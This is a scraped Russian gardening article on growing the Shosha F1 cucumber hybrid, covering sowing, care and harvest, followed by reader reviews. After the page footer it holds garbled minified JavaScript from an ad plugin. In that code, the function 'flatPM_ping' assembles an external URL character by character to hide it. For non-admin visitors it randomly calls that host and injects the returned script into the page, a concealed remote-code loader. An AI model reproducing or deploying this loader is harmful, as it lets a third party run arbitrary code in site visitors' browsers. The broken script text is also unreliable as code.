  2. Отличную урожайность. При соблюдении агротехники растение буквально усыпано пучками огурчиков.
  3. Универсальность использования. Сорт подходит для выращивания в открытом и закрытом грунте.
  4. Высокую устойчивость к основным заболеваниям огурцов.

Технология посева

Огурцы сорта Шоша можно выращивать через рассаду и прямым посевом в грунт.

Выращивание рассады

При рассадном способе выращивания семена высевают в начале апреля в отдельные горшочки. Перед посевом их рекомендуется прорастить. Для проращивания семена аккуратно раскладывают по влажной марле или на бумажной салфетке.

Емкость с замоченным семенным материалом помещают в теплое место с температурой не менее +25°. Через 2-3 дня появляются ростки. После этого можно сразу приступать к посеву.

Внимание! Огурцы очень плохо переносят пересадку. Поэтому посев семян обязательно осуществляют в индивидуальные емкости.

Для посева подготавливают рыхлый, питательный, влагоемкий субстрат. Почвосмесь можно составить следующим образом:

  • 3 части перегноя,
  • 2 части дерновой земли,
  • 1 часть чистого речного песка.

После появления всходов нужно своевременно поливать огурцы теплой водой. Воду лучше брать дождевую, колодезную или отстаивать водопроводную. На постоянное место рассаду огурцов высаживают после последних заморозков, в возрасте 25-30 дней.

Прямой посев в грунт

Огурец, как и другие представители семейства тыквенных, является исключительно теплолюбивой культурой. Его семена начинают прорастать при температуре от +15°. Поэтому весенний посев в открытый грунт лучше осуществлять на грядки, утепленные навозом.

Совет! Огурцы отлично развиваются и плодоносят даже на свежем навозе. Тепло и углекислый газ, выделяемые при его горении, повышают урожай на 40% и более.

Семена высевают в открытый грунт в начале-середине мая, в зависимости от региона. Глубина заделки семян в грунт не должна превышать 1 см. После появления всходов между растениями должно остаться 30-40 см. Лишние сеянцы при желании можно аккуратно пересадить. Для этого растения выкапывают с большим комом земли и переносят в заранее подготовленные лунки.

Основной уход за огурцами гибрида Шоша заключается в своевременных, обильных поливах.

Полив, рыхление, мульчирование почвы

В жаркую погоду растения поливают ежедневно. Так как у огурцов поверхностная корневая система, почва под кустами никогда не должна пересыхать полностью.

Для полива огурцов лучше использовать теплую воду.

Огурцы не терпят образования почвенной корки, возникающее при этом кислородное голодание значительно снижает урожай. Чтобы это предотвратить, после полива поверхность почвы рыхлят. Дополнительно можно провести мульчирование слоем торфа или перегноя. Слой органики отлично удерживает влагу, послужит дополнительным источником питания.

Подкормки

Раз в 10 дней полив совмещают с внесением удобрений. Для этого приготавливают сброженный раствор коровяка с добавлением золы или суперфосфата. Первую подкормку проводят перед началом цветения.

Внимание! Плоды огурцов склонны к накоплению нитратов, поэтому при их выращивании азотные удобрения используют крайне осторожно.

Подвязка

Шоша развивает длинные, мощные плети, поэтому их рекомендуется выращивать на шпалере. Опоры устанавливают сразу после появления первого настоящего листа. В качестве опор можно использовать:

  • пластиковую сетку,
  • натянутую между столбами бечевку.

Формирование, пасынкование

Чтобы получить высокий урожай, огурцы сорта Шоша Ф1 необходимо формировать. В первых 3-4 листовых пазухах удаляются все боковые побеги – прием называется пасынкование. Если этого не сделать растение тратит силы на развитие лишней листовой массы. В результате плодоношение запаздывает, показатели урожайности значительно снизятся.

Боковые побеги следует удалять сразу после того, как их длина достигнет 4-5 см. Ждать дальнейшего отрастания нельзя. Чем больше размер пасынков, тем хуже огурец переносит их выщипывание.

Сбор урожая

Зеленцы собирают ежедневно. Не следует дожидаться их перерастания. Большое количество переросших огурцов тормозит развитие новых цветов и способствует осыпанию уже сформировавшихся завязей. В результате урожайность снижается в 2 и более раза, сами растения начинают тормозить в росте, что приводит к сокращению продолжительности плодоношения.

Отзывы

Отзывы о выращивании данного гибрида можно публиковать в комментариях к статье. После проверки они будут опубликованы на сайте.

Шошу выращивала первый раз. Соблазнилась на выдающееся описание и характеристики. Сорт отлично развивался даже в условиях открытого грунта. Огурчики маленькие, хрустящие, сладкие. В маринованном виде просто великолепны. Обязательно посажу на следующий год.

Александра, 47 лет

Фотографии Шоши увидела на садово-огородном форуме. Сначала приняла их за очередную рекламу. Но почитав отзывы в интернете, решила попробовать. Сначала Шоша развивался как обычный самоопыляемый огурец. Но после начала плодоношения стало понятно, что показатели урожайности будут значительно выше. Также понравился вкус плодов, тонкая шкурка, сочная нежная мякоть и полное отсутствие горечи.

Сорт Шоша посоветовала знакомая. Найти семена в магазинах не удалось, поэтому пришлось заказывать через интернет. При посеве в открытый грунт растения развивались отлично. После того как все остальные сорта начали сохнуть от мучнистой росы, Шоша продолжать плодоносить. Урожайность сорта и вправду была впечатляющей.

Моя соседка очень расхваливала шошу, по урожайности и вкусу прямо лучший. А мне так себе. Шкурка толстая, перерастают и становятся дубовыми. Может дело в агротехнике, но больше экспериментировать не буду.

Ирина Л. Екатеринбург

Хороший сорт, выращивала на балконе в горшках диаметром 10 см. Проращивала сначала в торфяных таблетках, потом прямо в них в горшок. Огурчики вкусные, совсем не горчат, много зеленцов. Ставила сразу опору, они прекрасно взбирались.

Шоша всегда выручает, выращиваю несколько лет их, урожай отдает дружно, собираю ведро и мариную. Выращиваю в теплице из поликарбоната, под стенкой, света много. Отличные огурчики.

Ирина, Н. Новгород

Выращиваю шошу в теплице. Всхожесть хорошая, замачивала в туалетной бумаге, все 5 семечек проросли. Гибрид ранний. Урожайность радует, иногда встречаются в огурцах небольшие пустоты. На вкус огурец сладкий, завязей и огурцов много.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};